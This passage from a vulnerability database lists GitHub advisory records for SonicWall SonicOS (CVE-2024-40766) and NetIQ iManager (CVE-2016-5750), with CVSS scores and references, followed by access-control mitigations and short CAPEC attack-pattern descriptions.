"url": "http://www.zerodayinitiative.com/advisories/ZDI-16-362"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Jetty contains an alias issue that could allow unauthenticated remote code execution due to specially crafted request"
}
GHSA-8736-PR6R-R9HR
Vulnerability from github – Published: 2024-08-23 09:30 – Updated: 2025-10-22 00:33An improper access control vulnerability has been identified in the SonicWall SonicOS management access, potentially leading to unauthorized resource access and in specific conditions, causing the firewall to crash. This issue affects SonicWall Firewall Gen 5 and Gen 6 devices, as well as Gen 7 devices running SonicOS 7.0.1-5035 and older versions.
{
"affected": [],
"aliases": [
"CVE-2024-40766"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-23T07:15:03Z",
"severity": "CRITICAL"
},
"details": "An improper access control vulnerability has been identified in the SonicWall SonicOS management access, potentially leading to unauthorized resource access and in specific conditions, causing the firewall to crash. This issue affects SonicWall Firewall Gen 5 and Gen 6 devices, as well as Gen 7 devices running SonicOS 7.0.1-5035 and older versions.",
"id": "GHSA-8736-pr6r-r9hr",
"modified": "2025-10-22T00:33:05Z",
"published": "2024-08-23T09:30:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40766"
},
{
"type": "WEB",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-40766"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-873C-VMX2-MRPH
Vulnerability from github – Published: 2022-05-17 02:53 – Updated: 2022-05-17 02:53The certificate upload feature in iManager in NetIQ Access Manager 4.1 before 4.1.2 Hot Fix 1 and 4.2 before 4.2.2 could be used to upload JSP pages that would be executed as the iManager user, allowing code execution by logged-in remote users.
{
"affected": [],
"aliases": [
"CVE-2016-5750"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-03-23T06:59:00Z",
"severity": "HIGH"
},
"details": "The certificate upload feature in iManager in NetIQ Access Manager 4.1 before 4.1.2 Hot Fix 1 and 4.2 before 4.2.2 could be used to upload JSP pages that would be executed as the iManager user, allowing code execution by logged-in remote users.",
"id": "GHSA-873c-vmx2-mrph",
"modified": "2022-05-17T02:53:42Z",
"published": "2022-05-17T02:53:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-5750"
},
{
"type": "WEB",
"url": "https://www.novell.com/support/kb/doc.php?id=7017807"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-1
Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.
Mitigation MIT-46
Strategy: Separation of Privilege
- Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.
- Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
CAPEC-19: Embedding Scripts within Scripts
An adversary leverages the capability to execute their own script by embedding it within other scripts that the target software is likely to execute due to programs' vulnerabilities that are brought on by allowing remote hosts to execute scripts.
CAPEC-441: Malicious Logic Insertion
An adversary installs or adds malicious logic (also known as malware) into a seemingly benign component of a fielded system. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. With the proliferation of mass digital storage and inexpensive multimedia devices, Bluetooth and 802.11 support, new attack vectors for spreading malware are emerging for things we once thought of as innocuous greeting cards, picture frames, or digital projectors. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems and their components that are still under development and part of the supply chain.
CAPEC-478: Modification of Windows Service Configuration
An adversary exploits a weakness in access control to modify the execution parameters of a Windows service. The goal of this attack is to execute a malicious binary in place of an existing service.
CAPEC-479: Malicious Root Certificate
An adversary exploits a weakness in authorization and installs a new root certificate on a compromised system. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.
CAPEC-502: Intent Spoof
An adversary, through a previously installed malicious application, issues an intent directed toward a specific trusted application's component in an attempt to achieve a variety of different objectives including modification of data, information disclosure, and data injection. Components that have been unintentionally exported and made public are subject to this type of an attack. If the component trusts the intent's action without verififcation, then the target application performs the functionality at the adversary's request, helping the adversary achieve the desired negative technical impact.
CAPEC-503: WebView Exposure
An adversary, through a malicious web page, accesses application specific functionality by leveraging interfaces registered through WebView's addJavascriptInterface API. Once an interface is registered to WebView through addJavascriptInterface, it becomes global and all pages loaded in the WebView can call this interface.
CAPEC-536: Data Injected During Configuration
An attacker with access to data files and processes on a victim's system injects malicious data into critical operational data during configuration or recalibration, causing the victim's system to perform in a suboptimal manner that benefits the adversary.
CAPEC-546: Incomplete Data Deletion in a Multi-Tenant Environment
An adversary obtains unauthorized information due to insecure or incomplete data deletion in a multi-tenant environment. If a cloud provider fails to completely delete storage and data from former cloud tenants' systems/resources, once these resources are allocated to new, potentially malicious tenants, the latter can probe the provided resources for sensitive information still there.
CAPEC-550: Install New Service
When an operating system starts, it also starts programs called services or daemons. Adversaries may install a new service which will be executed at startup (on a Windows system, by modifying the registry). The service name may be disguised by using a name from a related operating system or benign software. Services are usually run with elevated privileges.
CAPEC-551: Modify Existing Service
When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.
CAPEC-552: Install Rootkit
An adversary exploits a weakness in authentication to install malware that alters the functionality and information provide by targeted operating system API calls. Often referred to as rootkits, it is often used to hide the presence of programs, files, network connections, services, drivers, and other system components.
CAPEC-556: Replace File Extension Handlers
When a file is opened, its file handler is checked to determine which program opens the file. File handlers are configuration properties of many operating systems. Applications can modify the file handler for a given file extension to call an arbitrary program when a file with the given extension is opened.
CAPEC-558: Replace Trusted Executable
An adversary exploits weaknesses in privilege management or access control to replace a trusted executable with a malicious version and enable the execution of malware when that trusted executable is called.
CAPEC-562: Modify Shared File
An adversary manipulates the files in a shared location by adding malicious programs, scripts, or exploit code to valid content. Once a user opens the shared content, the tainted content is executed.
CAPEC-563: Add Malicious File to Shared Webroot
An adversaries may add malicious content to a website through the open file share and then browse to that content with a web browser to cause the server to execute the content. The malicious content will typically run under the context and permissions of the web server process, often resulting in local system or administrative privileges depending on how the web server is configured.
CAPEC-564: Run Software at Logon
Operating system allows logon scripts to be run whenever a specific user or users logon to a system. If adversaries can access these scripts, they may insert additional code into the logon script. This code can allow them to maintain persistence or move laterally within an enclave because it is executed every time the affected user or users logon to a computer. Modifying logon scripts can effectively bypass workstation and enclave firewalls. Depending on the access configuration of the logon scripts, either local credentials or a remote administrative account may be necessary.
CAPEC-578: Disable Security Software
An adversary exploits a weakness in access control to disable security tools so that detection does not occur. This can take the form of killing processes, deleting registry keys so that tools do not start at run time, deleting log files, or other methods.